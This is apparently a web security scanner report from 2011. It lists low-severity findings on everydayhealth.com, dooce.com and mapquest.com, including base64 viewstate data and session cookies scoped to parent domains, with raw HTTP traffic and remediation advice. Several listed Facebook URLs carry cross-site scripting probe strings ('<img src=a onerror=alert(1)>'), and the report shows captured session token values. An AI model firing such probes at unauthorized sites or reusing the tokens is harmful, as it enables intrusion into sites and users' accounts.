BcnRpY2xlcyBvbiBIaWdoIENob2xlc3Rlcm9sZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFTmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hpZ2gtY2hvbGVzdGVyb2wvaGlnaC1jaG9sZXN0ZXJvbC10cmVhdG1lbnQuYXNweGQWAmYPFQEeSGlnaCAgIENob2xlc3Rlcm9sICAgVHJlYXRtZW50ZAIBD2QWAgIBDw8WAh8FBVpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFydC1kaXNlYXNlL2Nob2xlc3Rlcm9sL3Rha2luZy1hbi1pbmRpdmlkdWFsLWFwcHJvYWNoLmFzcHhkFgJmDxUBN1doeSAgQ2hvbGVzdGVyb2wgICBUcmVhdG1lbnQgIElzIERpZmZlcmVudCBGb3IgRXZlcnlvbmVkAgIPZBYCAgEPDxYCHwUFV2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1jZW50ZXIvaGlnaC1jaG9sZXN0ZXJvbC1zaG91bGQtaS10YWtlLXN0YXRpbnMuYXNweGQWAmYPFQEtSGlnaCAgIENob2xlc3Rlcm9sIDogU2hvdWxkIEkgVGFrZSAgU3RhdGlucyA/ZAIDD2QWBAIBDw8WAh8ABR9Nb3JlIG9uIENob2xlc3Rlcm9sIE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFK2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcGl0b3JkFgJmDxUBB0xpcGl0b3JkAgEPZBYCAgEPDxYCHwUFKWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL3pldGlhZBYCZg8VAQVaZXRpYWQCAg9kFgICAQ8PFgIfBQU2aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vZHJ1Z3MvY29lbnp5bWUtcTEwLWNvcTEwZBYCZg8VARRDb2VuenltZSBRMTAgKENvcTEwKWQCBA9kFgQCAQ8PFgIfAAUiQXNrIGEgUGhhcm1hY2lzdDogSGlnaCBDaG9sZXN0ZXJvbGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBX9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL25pZ2h0bWFyZXMvaS1oYXZlLXRha2VuLWxpcGl0b3ItYXRlbm9sb2wtc3RhdGlucy1hbmQtcHJvemFjLWZvci15ZWFycy1hcy13ZWxsLWFzZBYCZg8VAWFJIEhhdmUgVGFrZW4gTGlwaXRvciwgQXRlbm9sb2wsICBTdGF0aW5zICwgQW5kIFByb3phYyBGb3IgWWVhcnMsIEFzIFdlbGwgQXMgVml0YW1pbiBEIEFuZCBDYWxjaXVtZAIBD2QWAgIBDw8WAh8FBW5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhcmRpemVtL2lzLWNhcmRpemVtLXRoZS1iZXN0LW1lZGljYXRvbi1mb3ItYXRyaWFsLWZpYnJpbGxhdGlvbmQWAmYPFQE3SXMgQ2FyZGl6ZW0gVGhlIEJlc3QgTWVkaWNhdG9uIEZvciBBdHJpYWwgRmlicmlsbGF0aW9uP2QCAg9kFgICAQ8PFgIfBQWBAWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1xdWVzdGlvbnMvc3RvbWFjaC11cHNldC93aGljaC1vZi10aGVzZS1tZWRpY2F0aW9ucy1pcy1jYXVzaW5nLW15LXN0b21hY2gtcHJvYmxlbXMtbGlzaW5vcHJpbGQWAmYPFQFqV2hpY2ggT2YgVGhlc2UgTWVkaWNhdGlvbnMgSXMgQ2F1c2luZyBNeSBTdG9tYWNoIFByb2JsZW1zLCBMaXNpbm9wcmlsLCBNZXRmb3JtaW4sIFByYXZhc3RhdGluLCBPciBBc3BpcmluP2QCBw9kFgICAQ9kFgICAg8PFgIfAWhkZGQ=" />
...[SNIP]...

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGCA0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJUVnMgQ29tbW9uIGluIERheWNhcmUgQ2VudGVycyBEZXNwaXRlIEd1aWRlbGluZXMgLSBLaWRzJyBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1vcmUgdGhhbiB0d28tdGhpcmRzIG9mIGRheWNhcmUgY2VudGVycyBpbmNsdWRlZCBpbiBhIG5ldyBVLlMuIHN0dWR5IGhhdmUgVFZzIGF2YWlsYWJsZSBmb3IgY2hpbGRyZW4gdG8gd2F0Y2gsIGFuZCBuZWFybHkgNjAgcGVyY2VudCBvZiB0aGUgY2VudGVycyBpZ25vcmVkIHRoZSBBbWVyaWNhbiBBY2FkZW15IG9mIFBlZGlhdHJpY3MnIGd1aWRlbGluZXMgZm9yIHRlbGV2aXNpb24gZXhwb3N1cmUgaW4geW91bmcga2lkcy4iID4NCjxtZXRhIHByb3BlcnR5PSJvZzp0eXBlIiBjb250ZW50PSJhcnRpY2xlIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vaW1hZ2VzLmFnb3JhbWVkaWEuY29tL2V2ZXJ5ZGF5aGVhbHRoL2djbXMvbG9nb19laF81MHg1MC5naWYiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6c2l0ZV9uYW1lIiBjb250ZW50PSJFdmVyeWRheUhlYWx0aC5jb20iLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphcHBfaWQiIGNvbnRlbnQ9IjEzNTM0NjAzNjQ5MDE4NiIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFkbWlucyIgY29udGVudD0iIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgcnVuYXQ9InNlcnZlciIgaWQ9ImZidXJsIiBjb250ZW50PSJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9raWRzLWhlYWx0aC8wNTA0L3R2cy1jb21tb24taW4tZGF5Y2FyZS1jZW50ZXJzLWZsb3V0aW5nLWd1aWRlbGluZXMuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgMPZBYCAgEPZBYEAgEPDxYCHwAFIFJlbGF0ZWQgQXJ0aWNsZXMgb24gS2lkcycgSGVhbHRoZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgEPZBYCAgEPDxYCHwUFS2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3NsZWVwLXNvbHV0aW9ucy1mb3ItdG9kZGxlcnMuYXNweGQWAmYPFQEdU2xlZXAgU29sdXRpb25zIEZvciAgVG9kZGxlcnNkAgIPZBYCAgEPDxYCHwUFRGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLXBpY2t5LWVhdGVycy5hc3B4ZBYCZg8VAShIb3cgVG8gR2V0IFBpY2t5IEVhdGVycyBUbyBUcnkgTmV3IEZvb2RzZAIHD2QWBAIBD2QWAgICDw8WAh8BaGRkAgUPFgIfAWdkZA==" />
...[SNIP]...

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAXHBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSIzIFdheXMgdG8gUHV0IHRoZSBXb3chIEJhY2sgaW4gWW91ciBTZXggTGlmZSAtIFNleHVhbCBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlRoZXJlIGFyZSBtYW55IHRyZWF0bWVudCBvcHRpb25zIGF2YWlsYWJsZSB0byBoZWxwIHNleHVhbCBhcm91c2FsIGRpc29yZGVyLiBMZWFybiBhYm91dCBzZXggdGhlcmFweSwgaG9ybW9uZSB0aGVyYXB5LCBhbmQgb3RoZXIgYW5zd2VycyBmb3IgdGhpcyBzZXggZGlzb3JkZXIuIiA+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dHlwZSIgY29udGVudD0iYXJ0aWNsZSIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzppbWFnZSIgY29udGVudD0iaHR0cDovL2ltYWdlcy5hZ29yYW1lZGlhLmNvbS9ldmVyeWRheWhlYWx0aC9nY21zL2xvZ29fZWhfNTB4NTAuZ2lmIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnNpdGVfbmFtZSIgY29udGVudD0iRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YXBwX2lkIiBjb250ZW50PSIxMzUzNDYwMzY0OTAxODYiLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphZG1pbnMiIGNvbnRlbnQ9IiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzp1cmwiIHJ1bmF0PSJzZXJ2ZXIiIGlkPSJmYnVybCIgY29udGVudD0iaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vc2V4dWFsLWhlYWx0aC9zZXh1YWwtZHlzZnVuY3Rpb24vYWRkaXRpb25hbC10cmVhdG1lbnRzLWZvci1mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFYmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvc2V4dWFsLWR5c2Z1bmN0aW9uL2ZlbWFsZS1zZXh1YWwtYXJvdXNhbC1kaXNvcmRlci5hc3B4ZBYCZg8VATNUaGUgRmFjdHMgQWJvdXQgRmVtYWxlICBTZXh1YWwgICBBcm91c2FsICAgRGlzb3JkZXJkAgMPZBYGAgEPZBYEAgEPDxYCHwAFIVJlbGF0ZWQgQXJ0aWNsZXMgb24gU2V4dWFsIEhlYWx0aGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBWJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3NleHVhbC1keXNmdW5jdGlvbi9mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweGQWAmYPFQEzVGhlIEZhY3RzIEFib3V0IEZlbWFsZSAgU2V4dWFsICAgQXJvdXNhbCAgIERpc29yZGVyZAIBD2QWAgIBDw8WAh8FBUFodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3ZpYWdyYS1mb3Itd29tZW4uYXNweGQWAmYPFQERVmlhZ3JhIEZvciBXb21lbj9kAgIPZBYCAgEPDxYCHwUFUmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvaHlwb2FjdGl2ZS1zZXh1YWwtZGVzaXJlLWRpc29yZGVyLmFzcHhkFgJmDxUBKldoYXQgSXMgSHlwb2FjdGl2ZSBTZXh1YWwgRGVzaXJlIERpc29yZGVyP2QCAg9kFgQCAQ8PFgIfAAUTTW9yZSBvbiBNZWRpY2F0aW9uc2RkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBSxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9rbG9ub3BpbmQWAmYPFQEIS2xvbm9waW5kAgEPZBYCAgEPDxYCHwUFKmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2FtYmllbmQWAmYPFQEGQW1iaWVuZAICD2QWAgIBDw8WAh8FBSpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy96b2xvZnRkFgJmDxUBBlpvbG9mdGQCAw8PFgIfAWhkFgQCAQ8PFgIfAAUfQXNrIGEgUGhhcm1hY2lzdDogU2V4dWFsIEhlYWx0aGRkAgMPFgIfBGZkAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

10. Cookie scoped to parent domain previous next
There are 119 instances of this issue:

http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.mapquest.com/
http://www.mapquest.com/_svc/ad/getads
http://www.mapquest.com/_svc/apixel
http://www.mapquest.com/_svc/publishing/promo
http://www.mapquest.com/_svc/searchio
http://www.mapquest.com/cdn/_uac/adpage.htm
http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg
http://www.mapquest.com/icons/stop.png
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/AOLrealestate
http://www.facebook.com/BPAmerica
http://www.facebook.com/DailyFinance
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/LadyBonesie
http://www.facebook.com/Loizza
http://www.facebook.com/aim
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/reg_birthday_help.php
http://www.facebook.com/ajax/register/logging.php
http://www.facebook.com/aol
http://www.facebook.com/aolradio
http://www.facebook.com/badges
http://www.facebook.com/burkerkink
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/home.php
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/login.php
http://www.facebook.com/mapquest
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mmafighting
http://www.facebook.com/mobile
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/Barnesville/115038011847083
http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820
http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478
http://www.facebook.com/pages/Blaine-Senior-High/106189406087059
http://www.facebook.com/pages/Editor-in-Chief/137829579583400
http://www.facebook.com/pages/Gilco-Corporation/109823499042436
http://www.facebook.com/pages/HMFIC/149403761740008
http://www.facebook.com/pages/HuffPost-World/70242384902
http://www.facebook.com/pages/Manchester-Connecticut/112527912096312
http://www.facebook.com/pages/Merchandiser/123981654314779
http://www.facebook.com/pages/New-Haven-College/130105783687523
http://www.facebook.com/pages/Northern-Illinois-University/108155335871674
http://www.facebook.com/pages/San-Antonio-Texas/110297742331680
http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707
http://www.facebook.com/pages/Sporting-News/104068362964496
http://www.facebook.com/pages/ToP-SeCNeT/195242630519520
http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/profile.php
http://www.facebook.com/r.php
http://www.facebook.com/recover.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/sportingnews
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/techcrunch
http://www.facebook.com/terms.php
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp
http://www.google.com/finance
http://www.huffingtonpost.com/users/logout/
http://www.marketwatch.com/News/Story/Story.aspx
http://www.moviefone.com/
http://www.truveo.com/
http://www.truveo.com/search

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

10.2. http://www.mapquest.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

10.3. http://www.mapquest.com/_svc/ad/getads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
